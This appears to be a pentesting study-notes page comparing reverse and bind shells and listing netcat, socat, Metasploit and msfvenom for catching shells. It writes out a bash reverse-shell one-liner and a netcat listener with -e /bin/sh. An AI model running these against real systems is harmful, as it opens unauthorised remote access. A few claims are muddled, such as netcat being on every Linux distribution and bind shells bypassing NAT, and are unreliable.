Reverse Shells vs Bind Shells

Reverse Shell

  • Victim connects to us

  • Attack box is listening on a specific port

    • nc -lvp - means listening verbose port

    • -e /bin/sh executes

  • By far the most commonly used

  • Bash reverse shell command

    • bash -i >& /dev/tcp/0.0.0.0/4545 0>&1

Reverse Shell using netcat

Source: hackingtutorials.org

Bind Shell

  • Open up a port on victim machine and then connect to it

  • Useful when you have to bypass NAT or some sort of firewall

  • When connection has to come from external or outside network boundary

Netcat Bind Shell

Source: hackingtutorials.org

Tools

  • Netcat

    • Used to manually perform all kinds of networking interactions, including things like banner grabbing during enumeration

    • Can be used to receive reverse shells and connect to remote ports attached to bind shells on a target system

    • Easy to lose but can be improved

  • Socat

    • Like netcat on steroids

    • More stable than netcat shells out of the box

    • Two big catches:

      • The syntax is more difficult

      • Netcat is installed on every Linux distribution by default.

  • Metasploit -- multi/handler

    • The auxiliary/multi/handler module of the Metasploit framework, used to receive reverse shells

    • A fully-fledged way to obtain stable shells, with further options to improve the caught shell

    • The only way to interact with a meterpreter shell, the easiest way to handle staged payloads

  • Msfvenom

    • Used to generate payloads on the fly

    • Can generate payloads other than reverse and bind shells

  • Groovy Reverse Shell

PreviousNetcat Shell StabilizationNextStaged vs Non-Staged Payloads

Last updated